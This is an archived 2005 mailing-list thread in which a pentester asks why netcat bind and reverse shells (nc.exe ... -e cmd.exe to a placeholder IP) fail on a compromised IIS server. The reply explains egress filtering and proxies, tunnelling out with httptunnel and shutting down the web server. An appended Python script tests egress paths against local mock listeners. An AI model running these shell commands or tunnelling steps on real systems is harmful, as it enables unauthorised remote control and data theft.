Re: Netcat Question

From: Omar Herrera (oherrera@prodigy.net.mx)
Date: Wed Jun 01 2005 - 10:38:33 EDT


Most probably a firewall there, blocking your traffic. The fact that you can't see open ports with netcat from the outside is not surprising (the firewall might be allowing only ports 80 and 443).

But good egress filters are harder to find. Yet, there could be outbound filters also for ports like 443 and 53, or worse, a stateful engine allowing only outbound traffic that is related to valid established connections (there is no good reason for a web server to connect to port 443 on the Internet, in most cases, and address resolution might be restricted to local name servers).

Just to make sure, try port 80 (from the web server to your machine). It could also be that there are no egress filters or tight stateful rules in place, but just an application proxy. While testing port 80, try sending just any traffic first and then, in another connection, attempt a valid HTTP request, like:

> nc x.x.x.x 80
GET / HTTP/1.1
HOST: x.x.x.x

(enter enter)

If you are not able to establish the first connection but you can do it with a valid HTTP request, then you might assume that there are proxies filtering some ports. You might then need tools like httptunnel to get out, back to your machine. Proxies hold requests until they verify that they are valid.

Another indication of a proxy sitting there is that nc will report the connection as established but you won't see any packet arriving at your machine (until the proxy validates the request and forwards the traffic); use the -vv option with netcat to test for this.

If neither attempt is successful you still have some options, but it might require you to script something so that you don't get yourself locked out (also, make sure that your contract allows this; it will result in an obvious DoS). You could just shut down the web server and put netcat or another tool listening on ports 80/443 on the web server. Even with proxies there (you will still need to put the traffic in a tunnel in this case) you can be almost sure that you will be able to connect from the outside to this server on those ports.

Regards,

Omar

----- Original Message -----
From: intel96 <intel96@bellsouth.net>
> To All,
>
> I am conducting a pentest and I have been able to upload netcat to the
> web server (IIS 6.0 - with ports 80/443 open) via ftp. I have tried to
> establish a shell both ways, but cannot get it to work:
>
> On the web server I first tried: nc.exe -l -p 8000 -e cmd.exe
>
> When I tried to connect to port 8000 on the web server I received a
> timeout on my side. I have also tried this with port 53 and it also did
> not work.
>
> I then tried: nc.exe -nv my_public_ip_address 443 -d -e cmd.exe
>
> This did not work either. I did not see the remote system trying to
> connect to my system via my logs. I have access to upload anything to
> the system and run most commands via SQL injections. I have
> administrator level access on the system at this time.
>
> Any ideas on how I can get this shell to work? Or are there any other
> commands that may provide me more access or allow me to dump the
> database?
>
> Thanks,
>
> Intel96
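As an added example (not code from Omar's reply or from the original poster), here is the two-step comparison Omar describes written out as a small Python script: send arbitrary bytes first, then a well-formed HTTP request on a fresh connection, and classify the path as blocked, open or proxied. A network owner can run it from inside the perimeter to confirm that the egress proxy really rejects non-HTTP traffic on port 80 and that other outbound ports are closed. The three 127.0.0.1 listeners are constructed stand-ins for a proxy, an unfiltered service and a filtered port; the names (serve_mock, exchange, classify_egress) are my own, not those of any tool.

```python
import socket
import threading

# Constructed local stand-ins (not real hosts) for the three behaviours
# discussed in the thread: an application proxy that forwards only
# well-formed HTTP, a plain open port that accepts anything, and a
# filtered port with nothing listening.


def serve_mock(handler):
    """Start a tiny TCP server on 127.0.0.1 running `handler` per connection.
    Returns the ephemeral port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                handler(conn)

    threading.Thread(target=loop, daemon=True).start()
    return port


def proxy_like(conn):
    """Mimics an application proxy: answers a valid HTTP request, drops the rest."""
    data = conn.recv(1024)
    if data.startswith(b"GET ") and b" HTTP/1." in data:
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
    # Anything else: hang up without a byte, as the proxy never forwarded it.


def open_port(conn):
    """Mimics an unfiltered service that answers whatever arrives."""
    conn.sendall(b"got:" + conn.recv(1024))


def closed_port():
    """Pick a 127.0.0.1 port with nothing listening (constructed 'filtered' case)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def exchange(host, port, payload, timeout=2.0):
    """Connect, send `payload`, report the outcome: 'unreachable' (no TCP
    connection), 'timeout' (connected but nothing ever comes back, the symptom
    Omar describes for a proxy holding the request), 'closed' (peer hung up
    silently) or 'answered' (bytes received)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except OSError:
        s.close()
        return "unreachable"
    try:
        s.sendall(payload)
        data = s.recv(4096)
    except socket.timeout:          # must precede OSError: it is a subclass
        return "timeout"
    except OSError:
        return "closed"
    finally:
        s.close()
    return "answered" if data else "closed"


def classify_egress(host, port):
    """Arbitrary bytes first, then a valid HTTP request on a new connection.
    Returns 'blocked', 'open', 'proxy' or 'inconclusive'."""
    raw = exchange(host, port, b"\x00\x01not-http\r\n")
    http = exchange(host, port,
                    b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n\r\n")
    if raw == "unreachable" and http == "unreachable":
        return "blocked"       # firewall or nothing listening: no path at all
    if raw == "answered":
        return "open"          # anything goes through: no application-layer filter
    if http == "answered":
        return "proxy"         # only well-formed HTTP is forwarded
    return "inconclusive"


if __name__ == "__main__":
    for label, port in (("proxy", serve_mock(proxy_like)),
                        ("open", serve_mock(open_port)),
                        ("blocked", closed_port())):
        print(f"expected {label:8s} -> classified {classify_egress('127.0.0.1', port)}")
```

Against a real egress path, replace the mock listeners with a host you control outside the perimeter; a "proxy" verdict on port 80 together with "blocked" on 443 and 53 is the outcome a tight egress policy should produce.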



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:22 EDT